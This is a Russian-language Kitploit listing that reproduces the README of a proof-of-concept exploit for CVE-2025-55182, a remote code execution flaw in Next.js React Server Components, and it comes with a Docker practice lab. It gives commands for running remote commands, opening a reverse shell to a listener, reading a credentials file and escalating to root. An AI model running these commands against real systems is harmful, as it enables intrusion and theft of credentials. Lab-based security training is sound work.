Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC_react2shell_CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC_react2shell_CVE-2025-55182

РепозиторийСайт
28 месяцев назадЕщё не проверено

Эксплойт RCE для Next.js React Server Components

Эксплуатирует CVE-2025-55182 для удалённого выполнения кода через prototype pollution.

Автор: Severian N.K.

Описание

Этот инструмент эксплуатирует уязвимость prototype pollution в приложениях Next.js, использующих React Server Components, что приводит к удалённому выполнению кода (RCE). Он поддерживает как прямое выполнение команд, так и обратные оболочки.

Установка

Этот проект использует виртуальное окружение Python для управления зависимостями. Убедитесь, что у вас установлен Python 3.

  1. Настройка виртуального окружения:

    root@kitploit:~
    python3 -m venv venv
    
  2. Активируйте окружение и установите зависимости:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

Использование

Убедитесь, что виртуальное окружение активировано (source venv/bin/activate), перед запуском эксплойта.

Выполнение команд

Чтобы выполнить одну команду на цели:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

Пример:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

Обратная оболочка

Чтобы получить обратную оболочку с цели:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

Пример:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

Лабораторное окружение

Каталог lab/ содержит два независимых Docker-окружения:

  1. Уязвимое приложение (lab/vulnerable): работает на порту 3000.
  2. Запатченное приложение (lab/patched): работает на порту 3001.

1. Настройка уязвимого приложения

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

Доступ по адресу: http://localhost:3000

2. Настройка запатченного приложения

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

Доступ по адресу: http://localhost:3001

3. Тест обратной оболочки

Вы должны указать IP-адрес слушателя (--lhost) и порт (--lport). IP-адрес моста Docker можно найти с помощью ip addr show docker0 (обычно 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

Примечание: Мы используем -P nc-mkfifo, поскольку на целевой системе работает Alpine Linux, для которой требуется особый тип полезной нагрузки.

Шаг 2: Доступ к секретам

Уязвимый контейнер предоставляет доступ к секретному файлу.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

Шаг 3: Повышение привилегий

Вы можете повысить привилегии с пользователя nextjs до root, используя скомпрометированные учётные данные.

  1. Смена пользователя: su - manager (Пароль: SuperSecret2025!)
  2. Получение прав root: sudo su (Пароль: SuperSecret2025!)
  3. Получение флага:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

Ссылки

  • Технический анализ (Gist)
  • Практическая лаборатория (TryHackMe)

Участие в разработке

Вклад приветствуется! Если вы нашли ошибку или у вас есть идея по улучшению, пожалуйста, откройте issue или отправьте pull request.

Скачать инструмент